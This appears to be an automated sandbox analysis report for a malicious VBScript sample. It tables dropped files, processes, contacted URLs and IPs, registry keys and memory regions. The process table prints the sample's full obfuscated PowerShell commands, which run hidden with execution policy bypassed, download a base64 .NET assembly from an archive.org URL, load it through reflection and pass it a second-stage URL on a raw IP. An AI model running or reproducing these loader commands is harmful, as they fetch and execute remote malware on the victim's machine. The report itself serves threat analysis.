Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
ZJbugHcHda.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i3jdj22.3ak.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1inyfbo.5zh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mizk0jab.mrd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opd2forr.11h.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ZJbugHcHda.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt
= ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly
='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod
= xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr
,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://134.255.227.248/xampp/kb/KNORKK.txt
|
134.255.227.248
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
http://134.255.227.248
|
unknown
|
||
|
http://134.255.227.248(
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600100.us.archive.org
|
207.241.227.240
|
||
|
198.187.3.20.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
134.255.227.248
|
unknown
|
Germany
|
||
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B044580000
|
trusted library section
|
page read and write
|
|
|
|
1B03C578000
|
trusted library allocation
|
page read and write
|
|
|
|
18B684F0000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
15E75BF6000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
6408EFB000
|
stack
|
page read and write
|
||
|
15E73ED4000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
15E75C1B000
|
heap
|
page read and write
|
||
|
15E73E1A000
|
heap
|
page read and write
|
||
|
15E75C13000
|
heap
|
page read and write
|
||
|
15E75C3B000
|
heap
|
page read and write
|
||
|
64085EF000
|
stack
|
page read and write
|
||
|
7FFD9BB13000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F2000
|
trusted library allocation
|
page read and write
|
||
|
15E75BE5000
|
heap
|
page read and write
|
||
|
15E75DE0000
|
heap
|
page read and write
|
||
|
15E73D60000
|
heap
|
page read and write
|
||
|
1B02C8D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
15E75D62000
|
heap
|
page read and write
|
||
|
15E75E61000
|
heap
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
15E75D4E000
|
heap
|
page read and write
|
||
|
6E81EFF000
|
stack
|
page read and write
|
||
|
18B6A020000
|
heap
|
page read and write
|
||
|
15E75C4E000
|
heap
|
page read and write
|
||
|
18B00001000
|
trusted library allocation
|
page read and write
|
||
|
18B00023000
|
trusted library allocation
|
page read and write
|
||
|
15E75C8C000
|
heap
|
page read and write
|
||
|
15E757A0000
|
heap
|
page read and write
|
||
|
15E75BF3000
|
heap
|
page read and write
|
||
|
1B029E50000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
18B10010000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
15E75D64000
|
heap
|
page read and write
|
||
|
15E75CE0000
|
heap
|
page read and write
|
||
|
63B3FE000
|
stack
|
page read and write
|
||
|
15E75BE3000
|
heap
|
page read and write
|
||
|
15E75BE2000
|
heap
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
63B0FF000
|
stack
|
page read and write
|
||
|
1B044430000
|
heap
|
page read and write
|
||
|
7FFD9B76C000
|
trusted library allocation
|
page read and write
|
||
|
64085AE000
|
stack
|
page read and write
|
||
|
18B6A790000
|
heap
|
page read and write
|
||
|
15E75D6F000
|
heap
|
page read and write
|
||
|
15E75BE9000
|
heap
|
page read and write
|
||
|
1B029E70000
|
heap
|
page read and write
|
||
|
18B68578000
|
heap
|
page read and write
|
||
|
18B0011F000
|
trusted library allocation
|
page read and write
|
||
|
7DF411530000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B02C351000
|
trusted library allocation
|
page read and write
|
||
|
15E73E19000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1B02A0C0000
|
trusted library allocation
|
page read and write
|
||
|
15E75C00000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1B044044000
|
heap
|
page read and write
|
||
|
15E75C22000
|
heap
|
page read and write
|
||
|
1B04402F000
|
heap
|
page read and write
|
||
|
1B02BA70000
|
heap
|
page read and write
|
||
|
6408E7F000
|
stack
|
page read and write
|
||
|
15E75BE1000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
6E81C7E000
|
stack
|
page read and write
|
||
|
15E75C92000
|
heap
|
page read and write
|
||
|
6E81DFF000
|
stack
|
page read and write
|
||
|
18B69F37000
|
heap
|
page execute and read and write
|
||
|
1B02DC5A000
|
trusted library allocation
|
page read and write
|
||
|
1B029EEE000
|
heap
|
page read and write
|
||
|
1B02C386000
|
trusted library allocation
|
page read and write
|
||
|
15E75C7B000
|
heap
|
page read and write
|
||
|
1B03C258000
|
trusted library allocation
|
page read and write
|
||
|
15E75C27000
|
heap
|
page read and write
|
||
|
15E75C2E000
|
heap
|
page read and write
|
||
|
6E81F7E000
|
stack
|
page read and write
|
||
|
640887E000
|
stack
|
page read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
18B6A670000
|
heap
|
page read and write
|
||
|
18B69F30000
|
heap
|
page execute and read and write
|
||
|
1B02C183000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B02C346000
|
trusted library allocation
|
page read and write
|
||
|
15E740B0000
|
heap
|
page read and write
|
||
|
6E820FE000
|
stack
|
page read and write
|
||
|
18B685E4000
|
heap
|
page read and write
|
||
|
1B02C35E000
|
trusted library allocation
|
page read and write
|
||
|
18B6A026000
|
heap
|
page read and write
|
||
|
1B029F00000
|
heap
|
page read and write
|
||
|
18B68530000
|
heap
|
page read and write
|
||
|
1B02DC56000
|
trusted library allocation
|
page read and write
|
||
|
640852E000
|
stack
|
page read and write
|
||
|
18B68503000
|
heap
|
page read and write
|
||
|
15E75C5B000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
15E75C3E000
|
heap
|
page read and write
|
||
|
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
15E73E1E000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1B02B920000
|
trusted library allocation
|
page read and write
|
||
|
18B6A750000
|
heap
|
page execute and read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B69EF0000
|
heap
|
page readonly
|
||
|
15E75BE3000
|
heap
|
page read and write
|
||
|
1B029EFA000
|
heap
|
page read and write
|
||
|
64084A3000
|
stack
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
15E75C00000
|
heap
|
page read and write
|
||
|
1B0441EB000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
15E75C16000
|
heap
|
page read and write
|
||
|
6E81CFE000
|
stack
|
page read and write
|
||
|
18B0009C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF1000
|
trusted library allocation
|
page read and write
|
||
|
18B00161000
|
trusted library allocation
|
page read and write
|
||
|
15E75C5B000
|
heap
|
page read and write
|
||
|
15E75C58000
|
heap
|
page read and write
|
||
|
18B6A5F3000
|
heap
|
page read and write
|
||
|
63A91A000
|
stack
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B029EB9000
|
heap
|
page read and write
|
||
|
15E73EC3000
|
heap
|
page read and write
|
||
|
15E73E1F000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
18B004F0000
|
trusted library allocation
|
page read and write
|
||
|
1B04425B000
|
heap
|
page read and write
|
||
|
15E73EE5000
|
heap
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
15E75C4B000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
15E75C00000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
18B68534000
|
heap
|
page read and write
|
||
|
18B69F40000
|
heap
|
page execute and read and write
|
||
|
15E75BE4000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E75C67000
|
heap
|
page read and write
|
||
|
15E75CE1000
|
heap
|
page read and write
|
||
|
18B6A5E8000
|
heap
|
page read and write
|
||
|
15E75BE5000
|
heap
|
page read and write
|
||
|
15E75D81000
|
heap
|
page read and write
|
||
|
18B6A5EB000
|
heap
|
page read and write
|
||
|
1B02BF61000
|
trusted library allocation
|
page read and write
|
||
|
18B686D0000
|
heap
|
page read and write
|
||
|
6E81E7C000
|
stack
|
page read and write
|
||
|
1B03BF61000
|
trusted library allocation
|
page read and write
|
||
|
6E819A3000
|
stack
|
page read and write
|
||
|
1B02A080000
|
heap
|
page read and write
|
||
|
15E75C64000
|
heap
|
page read and write
|
||
|
63B5FC000
|
stack
|
page read and write
|
||
|
1B03C24A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
6408DFE000
|
stack
|
page read and write
|
||
|
1B03CF78000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
15E75BFA000
|
heap
|
page read and write
|
||
|
18B0001B000
|
trusted library allocation
|
page read and write
|
||
|
18B6857D000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
15E73EC4000
|
heap
|
page read and write
|
||
|
18B68550000
|
heap
|
page read and write
|
||
|
6E823FE000
|
stack
|
page read and write
|
||
|
1B044239000
|
heap
|
page read and write
|
||
|
1B0441D2000
|
heap
|
page read and write
|
||
|
1B02A0E0000
|
trusted library allocation
|
page read and write
|
||
|
6408D7E000
|
stack
|
page read and write
|
||
|
15E740B5000
|
heap
|
page read and write
|
||
|
15E75D43000
|
heap
|
page read and write
|
||
|
15E75BEE000
|
heap
|
page read and write
|
||
|
1B02BDC5000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
18B685E0000
|
heap
|
page read and write
|
||
|
1B02B8B0000
|
trusted library allocation
|
page read and write
|
||
|
18B00533000
|
trusted library allocation
|
page read and write
|
||
|
1B02B8E0000
|
trusted library allocation
|
page read and write
|
||
|
15E75D44000
|
heap
|
page read and write
|
||
|
63ACFE000
|
stack
|
page read and write
|
||
|
63B4FF000
|
stack
|
page read and write
|
||
|
640994D000
|
stack
|
page read and write
|
||
|
18B6853A000
|
heap
|
page read and write
|
||
|
6E8207E000
|
stack
|
page read and write
|
||
|
1B02D63C000
|
trusted library allocation
|
page read and write
|
||
|
1B043F60000
|
heap
|
page read and write
|
||
|
18B0011C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E73E6F000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1B044229000
|
heap
|
page read and write
|
||
|
15E73EBA000
|
heap
|
page read and write
|
||
|
1B029F34000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
15E75BEB000
|
heap
|
page read and write
|
||
|
7FFD9BB09000
|
trusted library allocation
|
page read and write
|
||
|
15E75C94000
|
heap
|
page read and write
|
||
|
15E75BEE000
|
heap
|
page read and write
|
||
|
15E75DE1000
|
heap
|
page read and write
|
||
|
1B02A105000
|
heap
|
page read and write
|
||
|
6E822FE000
|
stack
|
page read and write
|
||
|
18B00123000
|
trusted library allocation
|
page read and write
|
||
|
1B044080000
|
heap
|
page execute and read and write
|
||
|
15E73C60000
|
heap
|
page read and write
|
||
|
15E75E60000
|
heap
|
page read and write
|
||
|
18B684C0000
|
heap
|
page read and write
|
||
|
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E75C37000
|
heap
|
page read and write
|
||
|
1B029F0E000
|
heap
|
page read and write
|
||
|
1B0440B0000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
63AFFF000
|
stack
|
page read and write
|
||
|
1B02C3B0000
|
trusted library allocation
|
page read and write
|
||
|
1B043FEC000
|
heap
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E81FFE000
|
stack
|
page read and write
|
||
|
18B69F00000
|
trusted library allocation
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
1B02A10B000
|
heap
|
page read and write
|
||
|
18B6A595000
|
heap
|
page read and write
|
||
|
1B02A100000
|
heap
|
page read and write
|
||
|
1B02D661000
|
trusted library allocation
|
page read and write
|
||
|
6408B77000
|
stack
|
page read and write
|
||
|
64089FE000
|
stack
|
page read and write
|
||
|
15E75D81000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
15E75C07000
|
heap
|
page read and write
|
||
|
1B02C38A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
15E73E1F000
|
heap
|
page read and write
|
||
|
15E75D8A000
|
heap
|
page read and write
|
||
|
18B0004C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
1B02D641000
|
trusted library allocation
|
page read and write
|
||
|
15E75C6C000
|
heap
|
page read and write
|
||
|
15E75D81000
|
heap
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B029EF0000
|
heap
|
page read and write
|
||
|
18B0006E000
|
trusted library allocation
|
page read and write
|
||
|
1B02BA76000
|
heap
|
page read and write
|
||
|
18B0015B000
|
trusted library allocation
|
page read and write
|
||
|
1B02DB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B00108000
|
trusted library allocation
|
page read and write
|
||
|
1B02BA10000
|
heap
|
page read and write
|
||
|
15E75D5C000
|
heap
|
page read and write
|
||
|
15E75D55000
|
heap
|
page read and write
|
||
|
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
|
15E75C73000
|
heap
|
page read and write
|
||
|
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
|
15E73E7A000
|
heap
|
page read and write
|
||
|
1B044190000
|
heap
|
page read and write
|
||
|
7FFD9B932000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1B02D689000
|
trusted library allocation
|
page read and write
|
||
|
6408BF9000
|
stack
|
page read and write
|
||
|
63ADFE000
|
stack
|
page read and write
|
||
|
64088FD000
|
stack
|
page read and write
|
||
|
6408C7E000
|
stack
|
page read and write
|
||
|
6408A7E000
|
stack
|
page read and write
|
||
|
15E75C67000
|
heap
|
page read and write
|
||
|
15E75D4E000
|
heap
|
page read and write
|
||
|
1B044256000
|
heap
|
page read and write
|
||
|
18B00604000
|
trusted library allocation
|
page read and write
|
||
|
15E75C80000
|
heap
|
page read and write
|
||
|
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
18B6A02A000
|
heap
|
page read and write
|
||
|
64098CE000
|
stack
|
page read and write
|
||
|
15E73D40000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
6E8247B000
|
stack
|
page read and write
|
||
|
1B02C57A000
|
trusted library allocation
|
page read and write
|
||
|
18B004C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
15E75D6E000
|
heap
|
page read and write
|
||
|
15E75D81000
|
heap
|
page read and write
|
||
|
15E75BFB000
|
heap
|
page read and write
|
||
|
1B043FAB000
|
heap
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1B044029000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
15E73E6F000
|
heap
|
page read and write
|
||
|
15E75CA1000
|
heap
|
page read and write
|
||
|
18B6A550000
|
heap
|
page read and write
|
||
|
18B1006F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
1B044086000
|
heap
|
page execute and read and write
|
||
|
6408AF8000
|
stack
|
page read and write
|
||
|
18B685ED000
|
heap
|
page read and write
|
||
|
15E75BE0000
|
heap
|
page read and write
|
||
|
1B029EB0000
|
heap
|
page read and write
|
||
|
15E75C0E000
|
heap
|
page read and write
|
||
|
1B02C772000
|
trusted library allocation
|
page read and write
|
||
|
6E81D7E000
|
stack
|
page read and write
|
||
|
15E75BF5000
|
heap
|
page read and write
|
||
|
15E75D5F000
|
heap
|
page read and write
|
||
|
15E75C8D000
|
heap
|
page read and write
|
||
|
18B0010E000
|
trusted library allocation
|
page read and write
|
||
|
15E75BEE000
|
heap
|
page read and write
|
||
|
1B02D8D2000
|
trusted library allocation
|
page read and write
|
||
|
15E75C87000
|
heap
|
page read and write
|
||
|
15E75BE9000
|
heap
|
page read and write
|
||
|
6E819EF000
|
stack
|
page read and write
|
||
|
15E75C78000
|
heap
|
page read and write
|
||
|
18B68725000
|
heap
|
page read and write
|
||
|
18B69EE0000
|
trusted library allocation
|
page read and write
|
||
|
1B02D888000
|
trusted library allocation
|
page read and write
|
||
|
18B6A547000
|
heap
|
page read and write
|
||
|
15E75C60000
|
heap
|
page read and write
|
||
|
15E75C21000
|
heap
|
page read and write
|
||
|
15E75BE6000
|
heap
|
page read and write
|
||
|
63B2FD000
|
stack
|
page read and write
|
||
|
1B043FC7000
|
heap
|
page read and write
|
||
|
15E75C47000
|
heap
|
page read and write
|
||
|
1B02D90F000
|
trusted library allocation
|
page read and write
|
||
|
1B02D665000
|
trusted library allocation
|
page read and write
|
||
|
15E75BEB000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1B029EF2000
|
heap
|
page read and write
|
||
|
15E75C02000
|
heap
|
page read and write
|
||
|
18B6A540000
|
heap
|
page read and write
|
||
|
18B10001000
|
trusted library allocation
|
page read and write
|
||
|
18B6AA40000
|
heap
|
page read and write
|
||
|
15E73E7A000
|
heap
|
page read and write
|
||
|
18B00051000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
1B02B9F0000
|
heap
|
page execute and read and write
|
||
|
15E75D67000
|
heap
|
page read and write
|
||
|
15E75D61000
|
heap
|
page read and write
|
||
|
1B02C565000
|
trusted library allocation
|
page read and write
|
||
|
1B02C362000
|
trusted library allocation
|
page read and write
|
||
|
15E73E2F000
|
heap
|
page read and write
|
||
|
18B0004F000
|
trusted library allocation
|
page read and write
|
||
|
15E75BF0000
|
heap
|
page read and write
|
||
|
1B029E40000
|
heap
|
page read and write
|
||
|
18B684A0000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1B029F3A000
|
heap
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B6A621000
|
heap
|
page read and write
|
||
|
1B02D8B4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB04000
|
